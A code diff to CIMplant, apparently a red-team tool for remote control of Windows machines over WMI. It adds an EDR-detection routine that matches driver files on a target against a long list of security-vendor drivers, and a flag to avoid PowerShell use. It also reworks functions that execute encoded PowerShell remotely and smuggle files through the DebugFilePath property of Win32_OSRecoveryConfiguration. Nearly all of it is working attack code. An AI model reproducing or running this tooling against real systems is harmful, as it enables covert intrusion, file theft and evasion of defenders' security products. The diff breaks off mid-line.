diff --git a/CIMplant/Commander.cs b/CIMplant/Commander.cs old mode 100755 new mode 100644 index 0a41293..18648a4 --- a/CIMplant/Commander.cs +++ b/CIMplant/Commander.cs @@ -10,7 +10,7 @@ public class Commander { public string Command, Execute, File, Cmdlet, FileTo, Directory, RegKey, RegSubKey, RegVal, RegValType, Service, ServiceBin, Method, Process; - public bool Reset; + public bool Reset, NoPS; private readonly string[] _shutdown = { "logoff", "reboot", "restart", "power_off", "shutdown" }; private readonly string[] _fileCommand = { "cat", "copy", "download", "ls", "search", "upload" }; @@ -38,6 +38,7 @@ public Commander() this.Reset = Options.Instance.Reset; this.Process = Options.Instance.Process; this.Method = null; + this.NoPS = Options.Instance.NoPS; } public Commander(string command) @@ -196,7 +197,7 @@ private void ParseCommands() "restart", "power_off", "shutdown", "vacant_system", "logon_events", "command_exec", "disable_wdigest", "enable_wdigest", "disable_winrm", "enable_winrm", - "reg_mod", "reg_create", "reg_delete", "remote_posh", "sched_job", "service_mod" + "reg_mod", "reg_create", "reg_delete", "remote_posh", "sched_job", "service_mod", "edr_query" }; public static void DisplayHelp(ParserResult result, IEnumerable errs) @@ -204,7 +205,7 @@ public static void DisplayHelp(ParserResult result, IEnumerable err HelpText helpText = HelpText.AutoBuild(result, h => { h.AdditionalNewLineAfterOption = false; - h.Heading = "WMI C# Version 0.1"; //change header + h.Heading = "WMI C# Version 0.2"; //change header h.Copyright = ""; //change copyright text h.AutoVersion = false; return HelpText.DefaultParsingErrorsHandler(result, h); @@ -311,6 +312,10 @@ public class Options [Option("provider", Required = false, HelpText = "Use InstallUtil to register a WMI provider (Not Currently Working)", Default = false)] public bool Provider { get; set; } + + [Option("nops", Required = false, HelpText = "Do not allow any PowerShell execution (will die before)", + Default = false)] + public bool NoPS { get; set; } [Option("show-commands", Group = "Command", Required = true, HelpText = "Displays a list of available commands")] diff --git a/CIMplant/Connector.cs b/CIMplant/Connector.cs old mode 100755 new mode 100644 index 53e32cb..e30f4d2 --- a/CIMplant/Connector.cs +++ b/CIMplant/Connector.cs @@ -65,6 +65,7 @@ private CimSession DoCimConnection(Planter planter) sessionOptions.AddDestinationCredentials(credentials); sessionOptions.MaxEnvelopeSize = 256000; // Not sure how else to get around this connectedCimSession = CimSession.Create(SystemToConn, sessionOptions); + } else @@ -73,9 +74,15 @@ private CimSession DoCimConnection(Planter planter) connectedCimSession = CimSession.Create(SystemToConn, options); } + //connectedCimSession.TestConnection(); + // Test connection to make sure we're connected - if (!connectedCimSession.TestConnection()) + if (!connectedCimSession.TestConnection(out CimInstance instance, out CimException exception)) + { return null; + } + + Messenger.GoodMessage("[+] Connected\n"); return connectedCimSession; diff --git a/CIMplant/ExecuteCIM.cs b/CIMplant/ExecuteCIM.cs old mode 100755 new mode 100644 index d2a367f..4f9854c --- a/CIMplant/ExecuteCIM.cs +++ b/CIMplant/ExecuteCIM.cs @@ -268,6 +268,291 @@ public object vacant_system(Planter planter) return queryInstance; } + // Idea and some code thanks to Harley - https://github.com/harleyQu1nn/AggressorScripts/blob/master/EDR.cna + public object edr_query(Planter planter) + { + CimSession cimSession = planter.Connector.ConnectedCimSession; + bool activeEdr = false; + + string fileQuery = @"SELECT * FROM CIM_DataFile WHERE Path = '\\windows\\System32\\drivers\\'"; + IEnumerable queryInstance = cimSession.QueryInstances(Namespace, "WQL", fileQuery); + + foreach (CimInstance cimObject in queryInstance) + { + string fileName = Path.GetFileName(cimObject.CimInstanceProperties["Name"].Value.ToString()); + + switch (fileName) + { + case "FeKern.sys": + case "WFP_MRT.sys": + Messenger.ErrorMessage("FireEye Found!"); + activeEdr = true; + break; + + case "eaw.sys": + Messenger.ErrorMessage("Raytheon Cyber Solutions Found!"); + activeEdr = true; + break; + + case "rvsavd.sys": + Messenger.ErrorMessage("CJSC Returnil Software Found!"); + activeEdr = true; + break; + + case "dgdmk.sys": + Messenger.ErrorMessage("Verdasys Inc. Found!"); + activeEdr = true; + break; + + case "atrsdfw.sys": + Messenger.ErrorMessage("Altiris (Symantec) Found!"); + activeEdr = true; + break; + + case "mbamwatchdog.sys": + Messenger.ErrorMessage("Malwarebytes Found!"); + activeEdr = true; + break; + + case "edevmon.sys": + case "ehdrv.sys": + Messenger.ErrorMessage("ESET Found!"); + activeEdr = true; + break; + + case "SentinelMonitor.sys": + Messenger.ErrorMessage("SentinelOne Found!"); + activeEdr = true; + break; + + case "edrsensor.sys": + case "hbflt.sys": + case "bdsvm.sys": + case "gzflt.sys": + case "bddevflt.sys": + case "AVCKF.SYS": + case "Atc.sys": + case "AVC3.SYS": + case "TRUFOS.SYS": + case "BDSandBox.sys": + Messenger.ErrorMessage("BitDefender Found!"); + activeEdr = true; + break; + + case "HexisFSMonitor.sys": + Messenger.ErrorMessage("Hexis Cyber Solutions Found!"); + activeEdr = true; + break; + + case "CyOptics.sys": + case "CyProtectDrv32.sys": + case "CyProtectDrv64.sys": + Messenger.ErrorMessage("Cylance Inc. Found!"); + activeEdr = true; + break; + + case "aswSP.sys": + Messenger.ErrorMessage("Avast Found!"); + activeEdr = true; + break; + + case "mfeaskm.sys": + case "mfencfilter.sys": + case "epdrv.sys": + case "mfencoas.sys": + case "mfehidk.sys": + case "swin.sys": + case "hdlpflt.sys": + case "mfprom.sys": + case "MfeEEFF.sys": + Messenger.ErrorMessage("McAfee Found!"); + activeEdr = true; + break; + + case "groundling32.sys": + case "groundling64.sys": + Messenger.ErrorMessage("Dell Secureworks Found!"); + activeEdr = true; + break; + + case "avgtpx86.sys": + case "avgtpx64.sys": + Messenger.ErrorMessage("AVG Technologies Found!"); + activeEdr = true; + break; + + case "pgpwdefs.sys": + case "GEProtection.sys": + case "diflt.sys": + case "sysMon.sys": + case "ssrfsf.sys": + case "emxdrv2.sys": + case "reghook.sys": + case "spbbcdrv.sys": + case "bhdrvx86.sys": + case "bhdrvx64.sys": + case "SISIPSFileFilter.sys": + case "symevent.sys": + case "vxfsrep.sys": + case "VirtFile.sys": + case "SymAFR.sys": + case "symefasi.sys": + case "symefa.sys": + case "symefa64.sys": + case "SymHsm.sys": + case "evmf.sys": + case "GEFCMP.sys": + case "VFSEnc.sys": + case "pgpfs.sys": + case "fencry.sys": + case "symrg.sys": + Messenger.ErrorMessage("Symantec Found!"); + activeEdr = true; + break; + + case "SAFE-Agent.sys": + Messenger.ErrorMessage("SAFE-Cyberdefense Found!"); + activeEdr = true; + break; + + case "CybKernelTracker.sys": + Messenger.ErrorMessage("CyberArk Software Found!"); + activeEdr = true; + break; + + case "klifks.sys": + case "klifaa.sys": + case "Klifsm.sys": + Messenger.ErrorMessage("Kaspersky Found!"); + activeEdr = true; + break; + + case "SAVOnAccess.sys": + case "savonaccess.sys": + case "sld.sys": + Messenger.ErrorMessage("Sophos Found!"); + activeEdr = true; + break; + + case "ssfmonm.sys": + Messenger.ErrorMessage("Webroot Software, Inc. Found!"); + activeEdr = true; + break; + + case "CarbonBlackK.sys": + case "carbonblackk.sys": + case "Parity.sys": + case "cbk7.sys": + case "cbstream.sys": + Messenger.ErrorMessage("Carbon Black Found!"); + activeEdr = true; + break; + + case "CRExecPrev.sys": + Messenger.ErrorMessage("Cybereason Found!"); + activeEdr = true; + break; + + case "im.sys": + case "CSAgent.sys": + case "CSBoot.sys": + case "CSDeviceControl.sys": + case "cspcm2.sys": + Messenger.ErrorMessage("CrowdStrike Found!"); + activeEdr = true; + break; + + case "cfrmd.sys": + case "cmdccav.sys": + case "cmdguard.sys": + case "CmdMnEfs.sys": + case "MyDLPMF.sys": + Messenger.ErrorMessage("Comodo Security Solutions Found!"); + activeEdr = true; + break; + + case "PSINPROC.SYS": + case "PSINFILE.SYS": + case "amfsm.sys": + case "amm8660.sys": + case "amm6460.sys": + Messenger.ErrorMessage("Panda Security Found!"); + activeEdr = true; + break; + + case "fsgk.sys": + case "fsatp.sys": + case "fshs.sys": + Messenger.ErrorMessage("F-Secure Found!"); + activeEdr = true; + break; + + case "esensor.sys": + Messenger.ErrorMessage("Endgame Found!"); + activeEdr = true; + break; + + case "csacentr.sys": + case "csaenh.sys": + case "csareg.sys": + case "csascr.sys": + case "csaav.sys": + case "csaam.sys": + Messenger.ErrorMessage("Cisco Found!"); + activeEdr = true; + break; + + case "TMUMS.sys": + case "hfileflt.sys": + case "TMUMH.sys": + case "AcDriver.sys": + case "SakFile.sys": + case "SakMFile.sys": + case "fileflt.sys": + case "TmEsFlt.sys": + case "tmevtmgr.sys": + case "TmFileEncDmk.sys": + Messenger.ErrorMessage("Trend Micro Inc Found!"); + activeEdr = true; + break; + + case "epregflt.sys": + case "medlpflt.sys": + case "dsfa.sys": + case "cposfw.sys": + Messenger.ErrorMessage("Check Point Software Technologies Found!"); + activeEdr = true; + break; + + case "psepfilter.sys": + case "cve.sys": + Messenger.ErrorMessage("Absolute Found!"); + activeEdr = true; + break; + + case "brfilter.sys": + Messenger.ErrorMessage("Bromium Found!"); + activeEdr = true; + break; + + case "LRAgentMF.sys": + Messenger.ErrorMessage("LogRhythm Found!"); + activeEdr = true; + break; + + case "libwamf.sys": + Messenger.ErrorMessage("OPSWAT Inc Found!"); + activeEdr = true; + break; + } + } + + if (!activeEdr) + Console.WriteLine("No EDR vendors found, tread carefully"); + + return true; + } + /////////////////////////////////////// FILE OPERATIONS ///////////////////////////////////////////////////////////////////// @@ -350,145 +635,152 @@ public object download(Planter planter) return null; } - string originalWmiProperty = GetOsRecovery(cimSession); - bool wsman = true; - bool resetEnvSize = false; - string originalRemoteEnvSize = EnvelopeSize.GetMaxEnvelopeSize(cimSession); - string originalLocalEnvSize = EnvelopeSize.GetLocalMaxEnvelopeSize(); + if (!planter.Commander.NoPS) + { + string originalWmiProperty = GetOsRecovery(cimSession); + bool wsman = true; + bool resetEnvSize = false; + string originalRemoteEnvSize = EnvelopeSize.GetMaxEnvelopeSize(cimSession); + string originalLocalEnvSize = EnvelopeSize.GetLocalMaxEnvelopeSize(); - // Get the local maxEnvelopeSize. If it's not set (default) let's note that - originalRemoteEnvSize = originalRemoteEnvSize == "0" ? "500" : originalRemoteEnvSize; - originalLocalEnvSize = originalLocalEnvSize == "0" ? "500" : originalLocalEnvSize; - - Messenger.GoodMessage("[+] Downloading file: " + downloadPath + "\n"); + // Get the local maxEnvelopeSize. If it's not set (default) let's note that + originalRemoteEnvSize = originalRemoteEnvSize == "0" ? "500" : originalRemoteEnvSize; + originalLocalEnvSize = originalLocalEnvSize == "0" ? "500" : originalLocalEnvSize; - if (wsman == true) - { - int fileSize = GetFileSize(downloadPath, cimSession); + Messenger.GoodMessage("[+] Downloading file: " + downloadPath + "\n"); - // We can modify this later easily to pass wsman if needed - using (PowerShell powershell = PowerShell.Create()) + if (wsman == true) { - try - { - powershell.Runspace = !string.IsNullOrEmpty(planter.Password?.ToString()) ? RunspaceCreate(planter) : RunspaceCreateLocal(); + int fileSize = GetFileSize(downloadPath, cimSession); - if (fileSize / 1024 > 450) + // We can modify this later easily to pass wsman if needed + using (PowerShell powershell = PowerShell.Create()) + { + try { - resetEnvSize = true; - Messenger.WarningMessage( - "[*] Warning: The file size is greater than 450 KB, setting the maxEnvelopeSizeKB higher..."); - int envSize = fileSize / 1024 > 250000 ? 999999999 : 256000; - EnvelopeSize.SetLocalMaxEnvelopeSize(envSize); - EnvelopeSize.SetMaxEnvelopeSize(envSize.ToString(), cimSession); - } + powershell.Runspace = !string.IsNullOrEmpty(planter.Password?.ToString()) ? RunspaceCreate(planter) : RunspaceCreateLocal(); - string command1 = "$data = Get-Content -Encoding byte -ReadCount 0 -Path '" + downloadPath + - "'"; - const string command2 = @"$encdata = [Int[]][byte[]]$data -Join ','"; - const string command3 = - @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; + if (fileSize / 1024 > 450) + { + resetEnvSize = true; + Messenger.WarningMessage( + "[*] Warning: The file size is greater than 450 KB, setting the maxEnvelopeSizeKB higher..."); + int envSize = fileSize / 1024 > 250000 ? 999999999 : 256000; + EnvelopeSize.SetLocalMaxEnvelopeSize(envSize); + EnvelopeSize.SetMaxEnvelopeSize(envSize.ToString(), cimSession); + } - if (powershell.Runspace.ConnectionInfo != null) - { - powershell.Commands.AddScript(command1, false); - powershell.Commands.AddScript(command2, false); - powershell.Commands.AddScript(command3, false); - powershell.Invoke(); + string command1 = "$data = Get-Content -Encoding byte -ReadCount 0 -Path '" + downloadPath + + "'"; + const string command2 = @"$encdata = [Int[]][byte[]]$data -Join ','"; + const string command3 = + @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; + if (powershell.Runspace.ConnectionInfo != null) + { + powershell.Commands.AddScript(command1, false); + powershell.Commands.AddScript(command2, false); + powershell.Commands.AddScript(command3, false); + powershell.Invoke(); + + } + else + wsman = false; } - else + catch (PSRemotingTransportException) + { wsman = false; - } - catch (PSRemotingTransportException) - { - wsman = false; + } } } - } - if (wsman == false) - { - // WSMAN not enabled on the remote system, use another method + if (wsman == false) + { + // WSMAN not enabled on the remote system, use another method - // We need to check for the remote file size. If over 500KB (or 450 to be sure) let's raise the maxEnvelopeSizeKB - int fileSize = GetFileSize(downloadPath, cimSession); + // We need to check for the remote file size. If over 500KB (or 450 to be sure) let's raise the maxEnvelopeSizeKB + int fileSize = GetFileSize(downloadPath, cimSession); - if (fileSize / 1024 > 450) - { - resetEnvSize = true; - int envSize = fileSize / 1024 > 250000 ? 999999999 : 256000; - Messenger.WarningMessage( - "[*] Warning: The file size is greater than 450 KB, setting the maxEnvelopeSizeKB higher..."); - if (fileSize / 1024 > 250000) - { - EnvelopeSize.SetLocalMaxEnvelopeSize(envSize); - EnvelopeSize.SetMaxEnvelopeSize("999999999", - cimSession); // This is the largest value we can set, so not sure if this will work - } - else + if (fileSize / 1024 > 450) { - EnvelopeSize.SetLocalMaxEnvelopeSize(envSize); - EnvelopeSize.SetMaxEnvelopeSize("256000", cimSession); + resetEnvSize = true; + int envSize = fileSize / 1024 > 250000 ? 999999999 : 256000; + Messenger.WarningMessage( + "[*] Warning: The file size is greater than 450 KB, setting the maxEnvelopeSizeKB higher..."); + if (fileSize / 1024 > 250000) + { + EnvelopeSize.SetLocalMaxEnvelopeSize(envSize); + EnvelopeSize.SetMaxEnvelopeSize("999999999", + cimSession); // This is the largest value we can set, so not sure if this will work + } + else + { + EnvelopeSize.SetLocalMaxEnvelopeSize(envSize); + EnvelopeSize.SetMaxEnvelopeSize("256000", cimSession); + } } - } - // Create the parameters and create the new process. Broken out to make it easier to follow what's up - CimMethodParametersCollection cimParams = new CimMethodParametersCollection(); + // Create the parameters and create the new process. Broken out to make it easier to follow what's up + CimMethodParametersCollection cimParams = new CimMethodParametersCollection(); - string encodedCommand = "$data = Get-Content -Encoding byte -ReadCount 0 -Path '" + downloadPath + - "'; $encdata = [Int[]][byte[]]$data -Join ','; $a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; - var encodedCommandB64 = - Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); - string fullCommand = "powershell -enc " + encodedCommandB64; + string encodedCommand = "$data = Get-Content -Encoding byte -ReadCount 0 -Path '" + downloadPath + + "'; $encdata = [Int[]][byte[]]$data -Join ','; $a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; + var encodedCommandB64 = + Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); + string fullCommand = "powershell -enc " + encodedCommandB64; - cimParams.Add(CimMethodParameter.Create("CommandLine", fullCommand, CimFlags.In)); + cimParams.Add(CimMethodParameter.Create("CommandLine", fullCommand, CimFlags.In)); - // We only need the first instance - cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams); - } + // We only need the first instance + cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams); + } - // Give it a second to write and check for changes to DebugFilePath - Thread.Sleep(1000); - Messenger.WarningMessage("\n[*] Checking for a modified DebugFilePath and grabbing the data. This may take a while if the file is large (USE WMI IF IT IS)\n"); + // Give it a second to write and check for changes to DebugFilePath + Thread.Sleep(1000); + Messenger.WarningMessage("\n[*] Checking for a modified DebugFilePath and grabbing the data. This may take a while if the file is large (USE WMI IF IT IS)\n"); - //string[] fileOutput = CheckForFinishedDebugFilePath(originalWMIProperty, cimSession).Split(','); - string fileOutput = CheckForFinishedDebugFilePath(originalWmiProperty, cimSession); + //string[] fileOutput = CheckForFinishedDebugFilePath(originalWMIProperty, cimSession).Split(','); + string fileOutput = CheckForFinishedDebugFilePath(originalWmiProperty, cimSession); - // We need to pause for a bit here for some reason - Thread.Sleep(5000); + // We need to pause for a bit here for some reason + Thread.Sleep(5000); - //Create list for bytes - List outputList = new List(); + //Create list for bytes + List outputList = new List(); - //Convert from int (bytes) to byte - foreach (string integer in fileOutput.Split(',')) - { - try + //Convert from int (bytes) to byte + foreach (string integer in fileOutput.Split(',')) { - byte a = (byte)Convert.ToInt32(integer); - outputList.Add(a); - } - catch - { - //pass + try + { + byte a = (byte)Convert.ToInt32(integer); + outputList.Add(a); + } + catch + { + //pass + } } - } - //Save to local dir if no directory specified - if (string.IsNullOrEmpty(writePath)) - writePath = Path.GetFileName(downloadPath); + //Save to local dir if no directory specified + if (string.IsNullOrEmpty(writePath)) + writePath = Path.GetFileName(downloadPath); - File.WriteAllBytes(writePath, outputList.ToArray()); + File.WriteAllBytes(writePath, outputList.ToArray()); - SetOsRecovery(cimSession, originalWmiProperty); + SetOsRecovery(cimSession, originalWmiProperty); - if (resetEnvSize) + if (resetEnvSize) + { + // Set the maxEnvelopeSizeKB back to the default val if we set it previously + EnvelopeSize.SetLocalMaxEnvelopeSize(Convert.ToInt32(originalLocalEnvSize)); + EnvelopeSize.SetMaxEnvelopeSize(originalRemoteEnvSize, cimSession); + } + } + else { - // Set the maxEnvelopeSizeKB back to the default val if we set it previously - EnvelopeSize.SetLocalMaxEnvelopeSize(Convert.ToInt32(originalLocalEnvSize)); - EnvelopeSize.SetMaxEnvelopeSize(originalRemoteEnvSize, cimSession); + Messenger.WarningMessage("Not running function to avoid any PowerShell usage, remove --nops or pick a new function"); } return true; @@ -604,121 +896,128 @@ public object upload(Planter planter) return null; } - string originalWmiProperty = GetOsRecovery(cimSession); - bool wsman = true; - bool resetEnvSize = false; - int envSize = 500; + if (!planter.Commander.NoPS) + { + string originalWmiProperty = GetOsRecovery(cimSession); + bool wsman = true; + bool resetEnvSize = false; + int envSize = 500; - Messenger.GoodMessage("[+] Uploading file: " + uploadFile + " to " + writePath); - Messenger.GoodMessage("--------------------------------------------------------------------\n"); + Messenger.GoodMessage("[+] Uploading file: " + uploadFile + " to " + writePath); + Messenger.GoodMessage("--------------------------------------------------------------------\n"); - // We need to check for the remote file size. If over 500KB (or 450 to be sure) let's raise the maxEnvelopeSizeKB - int fileSize = (int) new FileInfo(uploadFile).Length; //Value in KB + // We need to check for the remote file size. If over 500KB (or 450 to be sure) let's raise the maxEnvelopeSizeKB + int fileSize = (int)new FileInfo(uploadFile).Length; //Value in KB - if (fileSize / 1024 > 450) - { - resetEnvSize = true; - envSize = fileSize / 1024 > 250000 ? 999999999 : 256000; - Messenger.WarningMessage( - "[*] Warning: The file size is greater than 450 KB, setting the maxEnvelopeSizeKB higher..."); - if (fileSize / 1024 > 250000) - { - EnvelopeSize.SetLocalMaxEnvelopeSize(envSize); - EnvelopeSize.SetMaxEnvelopeSize("999999999", - cimSession); // This is the largest value we can set, so not sure if this will work - } - else + if (fileSize / 1024 > 450) { - EnvelopeSize.SetLocalMaxEnvelopeSize(envSize); - EnvelopeSize.SetMaxEnvelopeSize("256000", cimSession); + resetEnvSize = true; + envSize = fileSize / 1024 > 250000 ? 999999999 : 256000; + Messenger.WarningMessage( + "[*] Warning: The file size is greater than 450 KB, setting the maxEnvelopeSizeKB higher..."); + if (fileSize / 1024 > 250000) + { + EnvelopeSize.SetLocalMaxEnvelopeSize(envSize); + EnvelopeSize.SetMaxEnvelopeSize("999999999", + cimSession); // This is the largest value we can set, so not sure if this will work + } + else + { + EnvelopeSize.SetLocalMaxEnvelopeSize(envSize); + EnvelopeSize.SetMaxEnvelopeSize("256000", cimSession); + } } - } - List intList = new List(); - byte[] uploadFileBytes = File.ReadAllBytes(uploadFile); + List intList = new List(); + byte[] uploadFileBytes = File.ReadAllBytes(uploadFile); - //Convert from byte to int (bytes) - foreach (byte uploadByte in uploadFileBytes) - { - int a = uploadByte; - intList.Add(a); - } + //Convert from byte to int (bytes) + foreach (byte uploadByte in uploadFileBytes) + { + int a = uploadByte; + intList.Add(a); + } - SetOsRecovery(cimSession, string.Join(",", intList)); + SetOsRecovery(cimSession, string.Join(",", intList)); - // Give it a second to write and check for changes to DebugFilePath - Messenger.WarningMessage( - "\n[*] Checking for a modified DebugFilePath and grabbing the data. This may take a while if the file is large (USE WMI IF IT IS)\n"); - System.Threading.Thread.Sleep(1000); - CheckForFinishedDebugFilePath(originalWmiProperty, cimSession); + // Give it a second to write and check for changes to DebugFilePath + Messenger.WarningMessage( + "\n[*] Checking for a modified DebugFilePath and grabbing the data. This may take a while if the file is large (USE WMI IF IT IS)\n"); + System.Threading.Thread.Sleep(1000); + CheckForFinishedDebugFilePath(originalWmiProperty, cimSession); - if (wsman == true) - { - // We can modify this later easily to pass wsman if needed - using (PowerShell powershell = PowerShell.Create()) + if (wsman == true) { - try + // We can modify this later easily to pass wsman if needed + using (PowerShell powershell = PowerShell.Create()) { - if (!string.IsNullOrEmpty(planter.Password?.ToString())) - powershell.Runspace = RunspaceCreate(planter); - else - powershell.Runspace = RunspaceCreateLocal(); + try + { + if (!string.IsNullOrEmpty(planter.Password?.ToString())) + powershell.Runspace = RunspaceCreate(planter); + else + powershell.Runspace = RunspaceCreateLocal(); - const string command1 = - @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $encdata = $a.DebugFilePath"; - const string command2 = @"$decode = [byte[]][int[]]$encdata.Split(',') -Join ' '"; - string command3 = - @"[byte[]] $decoded = $decode -split ' '; Set-Content -Encoding byte -Force -Path '" + - writePath + "' -Value $decoded"; + const string command1 = + @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $encdata = $a.DebugFilePath"; + const string command2 = @"$decode = [byte[]][int[]]$encdata.Split(',') -Join ' '"; + string command3 = + @"[byte[]] $decoded = $decode -split ' '; Set-Content -Encoding byte -Force -Path '" + + writePath + "' -Value $decoded"; - if (powershell.Runspace.ConnectionInfo != null) - { - powershell.Commands.AddScript(command1, false); - powershell.Commands.AddScript(command2, false); - powershell.Commands.AddScript(command3, false); - powershell.Invoke(); + if (powershell.Runspace.ConnectionInfo != null) + { + powershell.Commands.AddScript(command1, false); + powershell.Commands.AddScript(command2, false); + powershell.Commands.AddScript(command3, false); + powershell.Invoke(); + } + else + wsman = false; } - else + catch (PSRemotingTransportException) + { wsman = false; - } - catch (PSRemotingTransportException) - { - wsman = false; + } } } - } - if (wsman == false) - { - // WSMAN not enabled on the remote system, use another method + if (wsman == false) + { + // WSMAN not enabled on the remote system, use another method - // Create the parameters and create the new process. Broken out to make it easier to follow what's up - CimMethodParametersCollection cimParams = new CimMethodParametersCollection(); + // Create the parameters and create the new process. Broken out to make it easier to follow what's up + CimMethodParametersCollection cimParams = new CimMethodParametersCollection(); - string encodedCommand = - "$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $encdata = $a.DebugFilePath; $decode = [byte[]][int[]]$encdata.Split(',') -Join ' '; [byte[]] $decoded = $decode -split ' '; Set-Content -Encoding byte -Force -Path '" + - writePath + "' -Value $decoded"; - var encodedCommandB64 = - Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); - string fullCommand = "powershell -enc " + encodedCommandB64; + string encodedCommand = + "$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $encdata = $a.DebugFilePath; $decode = [byte[]][int[]]$encdata.Split(',') -Join ' '; [byte[]] $decoded = $decode -split ' '; Set-Content -Encoding byte -Force -Path '" + + writePath + "' -Value $decoded"; + var encodedCommandB64 = + Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); + string fullCommand = "powershell -enc " + encodedCommandB64; - cimParams.Add(CimMethodParameter.Create("CommandLine", fullCommand, CimFlags.In)); + cimParams.Add(CimMethodParameter.Create("CommandLine", fullCommand, CimFlags.In)); - // We only need the first instance - cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams); + // We only need the first instance + cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams); - // Give it a second to write - System.Threading.Thread.Sleep(1000); - } + // Give it a second to write + System.Threading.Thread.Sleep(1000); + } - // Set OSRecovery back to normal pls - SetOsRecovery(cimSession, originalWmiProperty); + // Set OSRecovery back to normal pls + SetOsRecovery(cimSession, originalWmiProperty); - if (resetEnvSize) + if (resetEnvSize) + { + // Set the maxEnvelopeSizeKB back to the default val if we set it previously + EnvelopeSize.SetLocalMaxEnvelopeSize(500); + EnvelopeSize.SetMaxEnvelopeSize("500", cimSession); + } + } + else { - // Set the maxEnvelopeSizeKB back to the default val if we set it previously - EnvelopeSize.SetLocalMaxEnvelopeSize(500); - EnvelopeSize.SetMaxEnvelopeSize("500", cimSession); + Messenger.WarningMessage("Not running function to avoid any PowerShell usage, remove --nops or pick a new function"); } return true; @@ -746,173 +1045,197 @@ public object command_exec(Planter planter) Messenger.GoodMessage("[+] Executing command: " + planter.Commander.Execute); Messenger.GoodMessage("--------------------------------------------------------\n"); - if (wsman) + + if (!planter.Commander.NoPS) { - // We can modify this later easily to pass wsman if needed - using (PowerShell powershell = PowerShell.Create()) + if (wsman) { - try + // We can modify this later easily to pass wsman if needed + using (PowerShell powershell = PowerShell.Create()) { - if (!string.IsNullOrEmpty(planter.System?.ToString())) - powershell.Runspace = RunspaceCreate(planter); - else + try { - powershell.Runspace = RunspaceCreateLocal(); - powershell.AddCommand(command); - Collection result = powershell.Invoke(); - foreach (PSObject a in result) + if (!string.IsNullOrEmpty(planter.System?.ToString())) + powershell.Runspace = RunspaceCreate(planter); + else { - Console.WriteLine(a); - } + powershell.Runspace = RunspaceCreateLocal(); + powershell.AddCommand(command); + Collection result = powershell.Invoke(); + foreach (PSObject a in result) + { + Console.WriteLine(a); + } - return true; + return true; + } + } + catch (PSRemotingTransportException) + { + wsman = false; + goto GetOut; // Do this so we're not doing below work when we don't need to + } + catch (Exception e) + { + Console.WriteLine(e); } - } - catch (PSRemotingTransportException) - { - wsman = false; - goto GetOut; // Do this so we're not doing below work when we don't need to - } - catch (Exception e) - { - Console.WriteLine(e); - } - - if (powershell.Runspace.ConnectionInfo != null) - { - string command1 = "$data = (" + command + " | Out-String).Trim()"; - const string command2 = @"$encdata = [Int[]][Char[]]$data -Join ','"; - const string command3 = - @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; - - powershell.Commands.AddScript(command1, false); - powershell.Commands.AddScript(command2, false); - powershell.Commands.AddScript(command3, false); - // If running powershell.exe let's run it and not worry about the output otherwise it will hang for very long time - if (noDebugCheck) + if (powershell.Runspace.ConnectionInfo != null) { - // start the timer and get a timeout - DateTime startTime = DateTime.Now; - IAsyncResult asyncPs = powershell.BeginInvoke(); + string command1 = "$data = (" + command + " | Out-String).Trim()"; + const string command2 = @"$encdata = [Int[]][Char[]]$data -Join ','"; + const string command3 = + @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; - while (asyncPs.IsCompleted == false) + powershell.Commands.AddScript(command1, false); + powershell.Commands.AddScript(command2, false); + powershell.Commands.AddScript(command3, false); + + // If running powershell.exe let's run it and not worry about the output otherwise it will hang for very long time + if (noDebugCheck) { - //Console.WriteLine("Waiting for pipeline to finish..."); - Thread.Sleep(5000); + // start the timer and get a timeout + DateTime startTime = DateTime.Now; + IAsyncResult asyncPs = powershell.BeginInvoke(); - // Check on our timeout here - TimeSpan elasped = DateTime.Now.Subtract(startTime); - if (elasped > timeout) - break; - } + while (asyncPs.IsCompleted == false) + { + //Console.WriteLine("Waiting for pipeline to finish..."); + Thread.Sleep(5000); - //powershell.EndInvoke(asyncPs); + // Check on our timeout here + TimeSpan elasped = DateTime.Now.Subtract(startTime); + if (elasped > timeout) + break; + } + + //powershell.EndInvoke(asyncPs); + } + else + { + powershell.Invoke(); + } } else - { - powershell.Invoke(); - } + wsman = false; } - else - wsman = false; } - } - GetOut: - if (wsman == false) - { - if (string.IsNullOrEmpty(planter.System?.ToString())) + GetOut: + if (wsman == false) { - try + if (string.IsNullOrEmpty(planter.System?.ToString())) { - ProcessStartInfo procStartInfo = new ProcessStartInfo("cmd", "/c " + command) + try { - RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true - }; - - Process proc = new Process {StartInfo = procStartInfo}; - proc.Start(); + ProcessStartInfo procStartInfo = new ProcessStartInfo("cmd", "/c " + command) + { + RedirectStandardOutput = true, + UseShellExecute = false, + CreateNoWindow = true + }; + + Process proc = new Process { StartInfo = procStartInfo }; + proc.Start(); + + // Get the output into a string + string result = proc.StandardOutput.ReadToEnd(); + // Display the command output. + Console.WriteLine(result); + } + catch (Exception e) + { + Console.WriteLine(e); + } - // Get the output into a string - string result = proc.StandardOutput.ReadToEnd(); - // Display the command output. - Console.WriteLine(result); + return true; } - catch (Exception e) + + + // Create the parameters and create the new process. Broken out to make it easier to follow what's up + string encodedCommand = "$data = (" + command + + " | Out-String).Trim(); $encdata = [Int[]][Char[]]$data -Join ','; $a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; + var encodedCommandB64 